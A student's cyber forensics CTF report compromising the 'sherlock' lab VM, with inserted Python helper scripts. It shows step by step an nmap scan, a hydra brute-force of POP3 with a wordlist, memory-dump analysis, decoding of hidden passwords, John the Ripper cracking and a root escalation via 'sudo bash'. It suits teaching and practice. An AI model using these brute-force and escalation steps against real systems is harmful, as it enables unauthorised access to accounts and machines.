22MCAR0033 CF Activity2

The document describes the steps taken in a cyber forensics capture the flag (CTF) challenge. The steps include scanning a virtual machine network to find devices, port scanning a target system to discover open ports, exploiting services on open ports to retrieve files and information, cracking passwords, and using forensic tools to analyze memory dumps and image files. Clues and hints were followed at each step to escalate access, including decrypting files, brute-forcing passwords, and analyzing file metadata. The process culminated in fully compromising the target system.

Uploaded by

Fatema Taha

DEPARTMENT OF CS & IT

Activity-II
Cyber Forensic
(22MCAIS302)

Name: Mohammed Taha Alibhai


USN No.: 22MCAR0033
Semester: III
Course: MCA -ISMS
Submitted to: Professor Mohammed Tousif
Certificate
This is to certify that Mohammed Taha Alibhai satisfactorily
completed Assignment/Activity 2 prescribed by Jain
(Deemed-to-be University) for the Semester-III M.C.A degree course
in the year 2022-24.

USN No: 22MCAR0033


Date: 10/09/2023

M.Taha
Signature of Student Head of the Department Signature of Faculty
CTF Report

Prerequisites:

1) VMware Workstation or VirtualBox
2) Kali Linux
3) Kali's network adapter set to bridged mode, so that Kali and the target VM sit on the same LAN segment (the ARP-based discovery in Step 2 does not cross routers)
4) Wi-Fi/Ethernet connection

Step 1: Installing the system

Download the target VM from

https://drive.google.com/file/d/1UQMOphUUezNWwwTXGvdcMO1aLboETt6w/view, extract the
archive and import "sherlock.ova" into VMware or VirtualBox. Start the VM; it should boot to the
screen shown below.

Step 2: Scanning

Start Kali Linux, open a terminal and run "sudo su" to get a root shell (netdiscover needs raw socket
access to send ARP frames). Enter your password when prompted, then run "netdiscover".

Netdiscover is a network reconnaissance tool that discovers hosts on the local network by actively
sending ARP (Address Resolution Protocol) requests and listing the IP address, MAC (Media Access
Control) address and MAC vendor of every host that replies.

Once the scan completes you should see output like the following:

Since the target runs in VMware, we look for the entry whose MAC vendor is "VMware". Our Kali
machine is also a VMware guest but does not appear in the list: netdiscover reports hosts that answer
its ARP requests, and the scanning host does not answer its own.

With the target's IP address we can run a deeper scan with Nmap: nmap -sV <IP Address>

Nmap is a powerful open-source network scanner used to discover hosts, open ports, the services
behind them and their configuration.

-sV enables service version detection: for every open port Nmap probes the service and tries to
identify the software and version (for example the web, FTP or SSH server build). This is what makes
the scan useful for vulnerability assessment, since a version string can be matched against known
issues and missing patches.

In our example above the IP of the target is 192.168.0.28, so the command is:

nmap -sV 192.168.0.28

Note that Nmap scans the 1000 most common TCP ports by default; add -p- to cover all 65535 if a
service seems to be missing.

Output:

The scan shows four exposed services, which become our attack surface:

1) An open FTP port
2) An open SSH port
3) An open HTTP port
4) An open POP3 port

Step 4: Enumeration

We start with the HTTP port. Entering http://192.168.0.28 in a browser opens the following page:

Next we read the page content for hints. The text tells us the system belongs to Harshit. We then
inspect the page source for clues: right-click on the page and choose "View Page Source". At the very
bottom of the source we find the following hint:

Requesting the file it names, irene.mp4, from the web server returns the following file:

Playing the file yields nothing obvious, but a media file dropped as a hint is a strong candidate for
steganography. Before going down that path we try the SSH port with the username harshit, since we
know the machine is his.

Connecting to the SSH port shows the following banner:

The Morse code in the banner is another hint. Decoding it gives BASKERVILLE, which we use as the
passphrase to extract the data hidden in irene.mp4. This yields our first flag, worth 15 points.
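Decoding a Morse banner by hand is easy to get wrong, and a single wrong letter silently changes the passphrase. The helper below is added to this report as an illustration and is not part of the original write-up: it pulls the Morse lines out of a banner, decodes them, and re-encodes the result as a cross-check. SAMPLE_BANNER is constructed to carry the clue found above; the lab box's real banner text is not reproduced here.

```python
import re

# Added example (not from the original write-up): decode International Morse
# code found in a login banner. SAMPLE_BANNER is constructed for this report.

MORSE_TABLE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}
REVERSE_TABLE = {v: k for k, v in MORSE_TABLE.items()}

# A Morse line contains only dots, dashes, slashes (word gaps) and spaces.
MORSE_LINE_RE = re.compile(r"^[.\-/ ]+$")


def extract_morse_lines(banner):
    """Return the lines of a banner that look like Morse code."""
    lines = []
    for line in banner.splitlines():
        stripped = line.strip()
        # Require at least one dot or dash so blank or slash-only lines are skipped.
        if stripped and MORSE_LINE_RE.match(stripped) and set(stripped) & {".", "-"}:
            lines.append(stripped)
    return lines


def decode_morse(code):
    """Decode Morse text: letters separated by spaces, words by ' / '.

    Unknown symbols become '?' rather than being dropped, so a typo in the
    banner stays visible instead of silently changing the keyword.
    """
    words = []
    for word in code.split("/"):
        letters = [MORSE_TABLE.get(sym, "?") for sym in word.split()]
        if letters:
            words.append("".join(letters))
    return " ".join(words)


def encode_morse(text):
    """Encode text to Morse; used to cross-check a decoded keyword."""
    words = []
    for word in text.upper().split():
        words.append(" ".join(REVERSE_TABLE[ch] for ch in word if ch in REVERSE_TABLE))
    return " / ".join(words)


def decode_banner(banner):
    """Decode every Morse line in a banner; returns one string per line."""
    return [decode_morse(line) for line in extract_morse_lines(banner)]


# Constructed banner: a greeting, one Morse line and a prompt.
SAMPLE_BANNER = """\
Welcome to sherlock
-... .- ... -.- . .-. ...- .. .-.. .-.. .
Password:"""


if __name__ == "__main__":
    for keyword in decode_banner(SAMPLE_BANNER):
        print(keyword, "<-", encode_morse(keyword))
```

Paste the real banner into SAMPLE_BANNER (or read it from a file) and compare the re-encoded string against the banner before using the keyword as a passphrase.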

Next we brute-force Harshit's POP3 password so we can read his mail for further clues. Use the
following hydra command:

hydra -l harshit -P /usr/share/wordlists/rockyou.txt 192.168.0.28 pop3s

1. hydra: invokes Hydra, an online password-guessing tool.

2. -l harshit: a single username (lower-case -l; upper-case -L would take a list of usernames).

3. -P /usr/share/wordlists/rockyou.txt: the password list to try, here the RockYou wordlist that
ships with Kali (on a fresh install it may still need to be extracted from rockyou.txt.gz).

4. 192.168.0.28: the target host running the POP3 server.

5. pop3s: the service module. pop3s speaks TLS from the first byte and therefore defaults to
port 995; if the server only offers STARTTLS on port 110, use the pop3 module instead (hydra -U
pop3 lists its options).

Brute-forcing POP3 yields the output above: the password is superman. We can now log in to the
POP3 service and read Harshit's mail. Use the following command to open a session:

openssl s_client -crlf -connect 192.168.0.28:110 -starttls pop3

1. openssl: the OpenSSL command-line tool, the front end to the widely used open-source
SSL/TLS and cryptography library.

2. s_client: the generic SSL/TLS client subcommand; here it gives us an interactive session with
the mail server.

3. -crlf: translate line feeds typed at the terminal into CRLF (Carriage Return Line Feed) before
sending. POP3, like the other mail protocols, terminates every command with CRLF, and some
servers ignore commands that end in a bare LF.

4. -connect 192.168.0.28:110: the server address and port to connect to. Port 110 is the
standard POP3 port.

5. -starttls pop3: open the connection in plaintext, issue the POP3 STLS command and only then
negotiate TLS. This is how a server that does not offer implicit TLS on port 995 still protects
the login; without it, USER and PASS would cross the network in the clear.
The command yields the following output:

At the +OK prompt enter user harshit, then pass superman.

Once logged in, enter retr 1 to retrieve message 1. POP3 numbers messages from 1 in the order the
server stores them, so this is the first message in the mailbox, not necessarily the newest; list
shows how many there are. This gives the following result:

retr 2 yields:

retr 3 yields:

This email contains two hints:

1) A timestamp
2) The keyword "epoch"

"Epoch" implies the number is a Unix timestamp (seconds since 1970-01-01 UTC) rather than an
arbitrary value. Passing it through an epoch converter gives a date, and that date turns out to be the
name of a directory, shown below:
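The interactive openssl session above does the POP3 exchange by hand. The script below is added to this report as an illustration and is not part of the original write-up: it performs the same STARTTLS login with Python's poplib, pulls every message, and scans the bodies for epoch-style numbers so the timestamp hint is converted automatically. The host, account and password in the usage block are the ones found above; SAMPLE_MESSAGE is constructed for this report and is not one of Harshit's real mails, and accepting a self-signed certificate is an assumption about the lab box.

```python
import datetime as dt
import poplib
import re
import ssl

# Added example (not part of the original write-up): POP3 over STARTTLS with
# poplib, plus a scan of the mail body for Unix timestamps. SAMPLE_MESSAGE is
# constructed; no text here comes from the lab's mailbox.

# 10-digit (seconds) or 13-digit (milliseconds) integers not embedded in a
# longer number or a dotted value such as an IP address.
EPOCH_RE = re.compile(r"(?<![\d.])(\d{13}|\d{10})(?![\d.])")


def fetch_messages(host, user, password, port=110, timeout=10):
    """Log in with USER/PASS after STLS and return every message as text."""
    ctx = ssl.create_default_context()
    # Assumption: the lab server presents a self-signed certificate. Accept it
    # here only; never disable verification against a production mail server.
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.stls(context=ctx)          # same as "-starttls pop3" in openssl s_client
        conn.user(user)
        conn.pass_(password)
        count, _size = conn.stat()
        messages = []
        for number in range(1, count + 1):   # POP3 numbers messages from 1
            _resp, lines, _octets = conn.retr(number)
            messages.append(b"\r\n".join(lines).decode("utf-8", "replace"))
        return messages
    finally:
        conn.quit()


def parse_message(raw):
    """Split a message into a lower-cased header dict and the body text."""
    raw = raw.replace("\r\n", "\n")
    head, _sep, body = raw.partition("\n\n")
    headers = {}
    last = None
    for line in head.splitlines():
        if line[:1] in (" ", "\t") and last:      # folded continuation line
            headers[last] += " " + line.strip()
            continue
        name, sep, value = line.partition(":")
        if sep:
            last = name.strip().lower()
            headers[last] = value.strip()
    return headers, body


def epoch_to_utc(value):
    """Render a seconds or milliseconds epoch value as an ISO 8601 UTC string."""
    seconds = value // 1000 if value >= 10**12 else value
    return dt.datetime.fromtimestamp(seconds, tz=dt.timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def find_epoch_hints(text):
    """Return (timestamp, UTC string) for every epoch-looking number in text."""
    return [(int(m), epoch_to_utc(int(m))) for m in EPOCH_RE.findall(text)]


# Constructed sample mail carrying the kind of hint described above.
SAMPLE_MESSAGE = (
    "From: harshit@sherlock\r\n"
    "Subject: epoch\r\n"
    "\r\n"
    "The box was built at 1694304000, remember the epoch.\r\n"
)


if __name__ == "__main__":
    for raw in fetch_messages("192.168.0.28", "harshit", "superman"):
        headers, body = parse_message(raw)
        print(headers.get("subject"), find_epoch_hints(body))
```

Because the regex demands exactly 10 or 13 digits with no neighbouring digit or dot, ordinary port numbers and IP addresses in the mail are not mistaken for timestamps.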

Step 5: Vulnerability Analysis

We can now analyse the memory file found there with the Volatility framework. Volatility does not
come preinstalled on Kali; the following guide explains how to install it:

https://seanthegeek.net/1172/how-to-install-volatility-2-and-volatility-3-on-debian-ubuntu-or-kali-
linux/

Once Volatility is installed, run:

python2 vol.py -f john.mem imageinfo

We use python2 because Volatility 2 runs only on Python 2; Volatility 3 is a separate Python 3 rewrite
with different plugin names. The imageinfo plugin gathers basic information about the memory dump:
the suggested profile, the operating system version and the architecture.

The analysis tells us the dump was taken from Windows XP. Volatility 2's default profile is
WinXPSP2x86, which is why --profile can be omitted here; for any other OS pass the profile that
imageinfo suggests. We can now try the notepad plugin, which recovers the text of open Notepad
windows from the process heap. Replace imageinfo with notepad:

python2 vol.py -f john.mem notepad

The recovered text looks obfuscated rather than random; running it through a ROT13 converter gives
readable output:

The nmap scan showed an open FTP port. We can try logging in to FTP with the username john and the
password Guptchar (the ROT13 output).

Use ftp followed by the IP address to connect: ftp 192.168.0.28

Once logged in, ls lists the files and directories:

There is a directory called files; cd into it and we find two files:

1) 10_Points.txt
2) Mycroft.001

The .001 extension on the second file indicates the first segment of a split raw disk image, so we can
analyse it with Autopsy. Use get to download each file to the Kali machine.

We can now load the image into Autopsy for further analysis.

The directory analysis in Autopsy gives the following result:

Two clues stand out in this image. The first is the number 16, highlighted in red: read as hexadecimal,
0x16 is 22 in decimal, the SSH port. The second is the run of hexadecimal values highlighted in green:

Converting these bytes to ASCII gives Khufiya. We can now try logging in over SSH on port 22 with
the username Mycroft and the password Khufiya.
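Autopsy surfaced the hex bytes above in its viewer, but it is worth being able to reproduce the find from the command line. The script below is added to this report as an illustration and is not part of the original write-up: it carves printable strings out of a raw image with their byte offsets, the way strings(1) does, and additionally decodes any run of space- or colon-separated hex that turns into printable ASCII, which is exactly the shape of the green clue. The same first pass is a cheap way to triage a memory dump such as john.mem before reaching for Volatility. SAMPLE_IMAGE is constructed for this report; none of its bytes come from Mycroft.001.

```python
import mmap
import re

# Added example (not part of the original write-up): carve printable strings
# and hex-encoded ASCII from a raw image. SAMPLE_IMAGE is constructed here.

# Four or more hex byte pairs, optionally separated by spaces or colons.
HEX_RUN_RE = re.compile(rb"(?:[0-9A-Fa-f]{2}[ :]?){4,}")


def find_strings(data, min_len=4):
    """Like strings(1): (offset, text) for every run of printable ASCII."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def decode_hex_runs(data):
    """(offset, text) for hex runs whose decoded bytes are all printable.

    Runs that decode to binary (e.g. the hash-like 'deadbeef') are dropped,
    which keeps the output to values a human wrote into the image as a clue.
    """
    found = []
    for m in HEX_RUN_RE.finditer(data):
        cleaned = re.sub(rb"[ :]", b"", m.group())
        decoded = bytes.fromhex(cleaned.decode("ascii"))
        if decoded and all(0x20 <= b < 0x7F for b in decoded):
            found.append((m.start(), decoded.decode("ascii")))
    return found


def hex_port(token):
    """Interpret a short hex token as a port number (the '16' -> 22 clue)."""
    return int(token, 16)


def carve_file(path, min_len=4):
    """Run both carvers over a file without loading it fully into memory."""
    with open(path, "rb") as fh:
        with mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as view:
            return find_strings(view, min_len), decode_hex_runs(view)


# Constructed image: a label, a hex-encoded password and a port hint, padded
# with null bytes so the offsets are meaningful.
SAMPLE_IMAGE = (
    b"\x00" * 32
    + b"MYCROFT\x00"
    + b"\x00" * 8
    + b"4b 68 75 66 69 79 61"
    + b"\x00" * 16
    + b"\x01\x02hint:16"
    + b"\x00" * 4
)


if __name__ == "__main__":
    for offset, text in find_strings(SAMPLE_IMAGE):
        print(f"{offset:08x}  {text}")
    for offset, text in decode_hex_runs(SAMPLE_IMAGE):
        print(f"{offset:08x}  hex -> {text}")
    print("port:", hex_port("16"))
```

On a real image call carve_file("Mycroft.001"); the mmap keeps a multi-gigabyte dump from being read into RAM, and the offsets let you jump straight to the sector in Autopsy or a hex editor.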
Step 6: Exploitation

Use the command: sftp username@remote_server_ip

We will use: sftp Mycroft@192.168.0.28

Enter the password Khufiya.

Once we are in, ls shows two files:

1) 15_points.txt
2) jim.wav

Opening the sound file in Audacity reveals the following hint:

The hint points at DeepSound, so we use deepsound2john.py to turn the .wav into a hash that John
the Ripper understands and crack it with John:

/usr/share/john/deepsound2john.py jim.wav > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john --show hash

With the recovered password we can open the audio file in DeepSound and extract the files hidden
inside it.

This gives us the following two files:

creds.txt contains the string QmhlZGl5YQ==

The trailing == padding marks this as Base64, which is an encoding rather than encryption; decoding it
gives the phrase Bhediya.

We can now try logging in to the system with the password Bhediya and check whether that account
can reach root.
Step 7: Escalation of Privilege

Login successful. Run the following commands to elevate to root. sudo -l lists what this account may
run through sudo; when it reports (ALL) ALL, sudo bash starts a root shell.

sudo -l

sudo bash
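Reading sudo -l output by eye is fine for one box, but in a larger engagement it is worth parsing it. The helper below is added to this report as an illustration and is not part of the original write-up: it parses the "may run the following commands" section of sudo -l and flags rules that hand out a root shell, either outright through ALL or through a binary that can spawn one. SAMPLE_SUDO_L is constructed for this report; the lab box's actual sudo -l output is not shown on the page, and the SHELL_LIKE list is a small, deliberately incomplete sample of such binaries.

```python
import re
from collections import namedtuple

# Added example (not part of the original write-up): parse `sudo -l` output
# and flag rules that lead to a root shell. SAMPLE_SUDO_L is constructed.

Rule = namedtuple("Rule", "runas nopasswd commands")

# "(runas) TAG: TAG: cmd1, cmd2" -- tags such as NOPASSWD: are optional.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")

# Binaries that can spawn an interactive shell when run as root (partial list).
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "su", "vim", "vi", "less", "more",
              "find", "python", "python3", "perl", "awk", "env"}


def parse_sudo_l(text):
    """Return a Rule for every command line after 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:          # e.g. a wrapped continuation line; keep it simple
            continue
        runas, tags, cmds = m.groups()
        commands = [c.strip() for c in cmds.split(",") if c.strip()]
        rules.append(Rule(runas.strip(), "NOPASSWD:" in tags, commands))
    return rules


def _runs_as_root(runas):
    """'(ALL : ALL)' or '(root)' both allow running as root."""
    user = runas.split(":")[0].strip()
    return user in ("ALL", "root")


def risky_rules(rules):
    """Return (rule, reason) for every rule that yields a root shell."""
    findings = []
    for rule in rules:
        if not _runs_as_root(rule.runas):
            continue
        for cmd in rule.commands:
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((rule, "any command as root, e.g. sudo bash"))
                break
            if name in SHELL_LIKE:
                suffix = " without a password" if rule.nopasswd else ""
                findings.append((rule, f"{name} can spawn a shell as root{suffix}"))
                break
    return findings


# Constructed sudo -l output in the layout sudo prints on Debian-based systems.
SAMPLE_SUDO_L = """\
Matching Defaults entries for harshit on sherlock:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User harshit may run the following commands on sherlock:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/systemctl status
    (www-data) /usr/bin/id
"""


if __name__ == "__main__":
    for rule, reason in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"({rule.runas}) {', '.join(rule.commands)} -> {reason}")
```

Feed it the real output with parse_sudo_l(open("sudo-l.txt").read()); the (www-data) entry in the sample shows that a rule is only reported when the run-as user actually gets you root.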
